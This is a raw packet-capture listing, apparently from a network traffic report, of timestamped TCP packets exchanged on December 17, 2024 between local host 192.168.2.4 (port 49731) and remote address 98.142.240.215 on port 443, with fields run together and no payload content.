                                                                                                                                                                              Dec 17, 2024 18:12:40.491913080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.649636984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.649746895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.649811983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.651099920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.651489019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.651560068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.651571035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.651611090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.653686047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.653785944 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.653794050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.654319048 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.657224894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.657314062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.657320976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.657427073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.658523083 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.658605099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.658610106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.658659935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.660722971 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.660804987 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.660814047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.660859108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.663060904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.663147926 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.663153887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.663192034 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.665395021 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.665529966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.665535927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.665584087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.667675972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.667749882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.667756081 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.667793989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.671866894 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.671943903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.671952963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.672043085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.672614098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.672683001 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.672687054 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.672808886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.674962044 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.675034046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.675040007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.675081968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.677721977 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.677788973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.677794933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.677835941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.679318905 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.679404020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.679408073 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.679452896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.681663990 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.681740999 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.681746960 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.681793928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.685551882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.685750961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.685756922 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.685806990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.841463089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.841615915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.841638088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.843086004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.843403101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.843492031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.843503952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.846520901 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.846616030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.846628904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.848069906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.848154068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.848165989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.849066019 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.850361109 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.850440979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.850452900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.852075100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.853466034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.853544950 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.853559017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.855004072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.855087042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.855099916 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.857064962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.858167887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.858273983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.858295918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.860080957 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.860428095 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.860502958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.860513926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.862787008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.862884045 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.862890959 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.862937927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.865099907 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.865195036 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.865206003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.867160082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.867397070 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.867465973 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.867471933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.869695902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.869769096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.869777918 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.872117996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.872199059 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.872208118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.872248888 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.874381065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.874455929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.874464035 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.876768112 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.876857042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:40.876863003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:40.876910925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.033711910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.033803940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.033813953 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.033853054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.035820007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.035897970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.035902023 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.036093950 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.038070917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.038149118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.038152933 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.038233042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.041066885 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.041150093 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.041155100 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.041193962 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.044635057 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.044703960 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.044712067 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.044745922 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.046294928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.046375990 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.046380997 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.046421051 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.048536062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.048616886 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.048620939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.048660040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.051495075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.051570892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.051574945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.051613092 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.052995920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.053062916 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.053066969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.053137064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.055876017 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.055958986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.055963039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.056044102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.058129072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.058202982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.058209896 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.058300018 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.061388016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.061453104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.061456919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.061491013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.062803984 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.062875986 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.062880039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.062917948 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.065912962 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.066001892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.066008091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.066040993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.068211079 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.068284035 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.068288088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.068507910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.069825888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.069901943 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.069905996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.069937944 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.248796940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.248992920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.249007940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.249099970 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.251873970 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.251966000 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.252003908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.252058029 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.253984928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.254072905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.254095078 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.254157066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.256520987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.256633043 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.256647110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.257426023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.258455038 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.258543968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.258558989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.258620977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.260937929 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.261022091 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.261035919 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.261102915 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.263251066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.263360977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.263376951 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.263459921 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.266351938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.266436100 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.266448975 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.266509056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.268021107 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.268093109 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.268107891 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.268172026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.270158052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.270226002 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.270234108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.270684958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.272459030 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.272545099 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.272552967 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.272595882 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.274826050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.274899960 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.274908066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.274959087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.277436972 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.277508974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.277517080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.279356956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.279438019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.279500961 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.279508114 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.281737089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.281794071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.281801939 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.283035994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.284085989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.284147024 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.284153938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.286267042 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.442874908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.443042040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.443063974 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.443108082 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.444899082 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.444988966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.444997072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.445039034 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.447915077 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.448009014 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.448015928 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.448062897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.450238943 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.450306892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.450313091 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.450356007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.452627897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.452723026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.452728987 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.452769995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.454884052 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.454956055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.454962015 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.455003023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.457623005 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.457847118 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.457851887 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.457901955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.459656000 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.459729910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.459734917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.459777117 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.461894989 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.461968899 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.461973906 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.462014914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.464467049 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.464540958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.464550018 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.464587927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.466588020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.466650009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.466655016 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.466696978 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.468854904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:41.468944073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:41.468950033 CET4434973198.142.240.215192.168.2.4
